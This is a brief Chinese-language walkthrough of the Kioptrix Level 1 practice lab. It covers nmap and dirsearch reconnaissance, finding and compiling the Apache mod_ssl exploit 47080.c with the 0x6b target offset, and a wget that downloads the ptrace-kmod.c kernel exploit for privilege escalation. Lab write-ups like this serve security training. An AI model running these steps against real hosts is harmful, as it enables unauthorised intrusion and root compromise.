Kioptrix Level1
靶机截图
收集信息
主机发现
靶机地址为10.4.7.221
nmap -sP 10.4.7.0/24
端口扫描
nmap -sS -O -sV -p- 10.4.7.221
PORT | STATE | SERVICE | VERSION |
22/tcp | open | ssh | OpenSSH 2.9p2 (protocol 1.99) |
80/tcp | open | http | Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) |
111/tcp | open | rpcbind | 2 (RPC #100000) |
443/tcp | open | Apache/1.3.20 (Unix) | Apache httpd 2.0.52 ((CentOS)) |
139/tcp | open | netbios-ssn | Samba smbd (workgroup: MYGROUP) |
1024/tcp | open | status | 1 (RPC #100024) |
系统版本为linux 2.4.9-2.4.18
web指纹
目录扫描
dirsearch -u http://10.4.7.221
访问下随便点点看到有Apache的版本
渗透过程
根据上面的信息,搜一下exp
searchsploit Apache 1.3.20
看着都像,一个一个试试
前两个都编译不成功,47080.c可以编译。
显示很多过滤下,前面得知为redhat,那么咱们就试下0x6a和0x6b
0x6a不行
试试0x6b,ok没毛病
提权
根据提示去下载
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
下载成功后传至靶机进行编译
总结
1.exp利用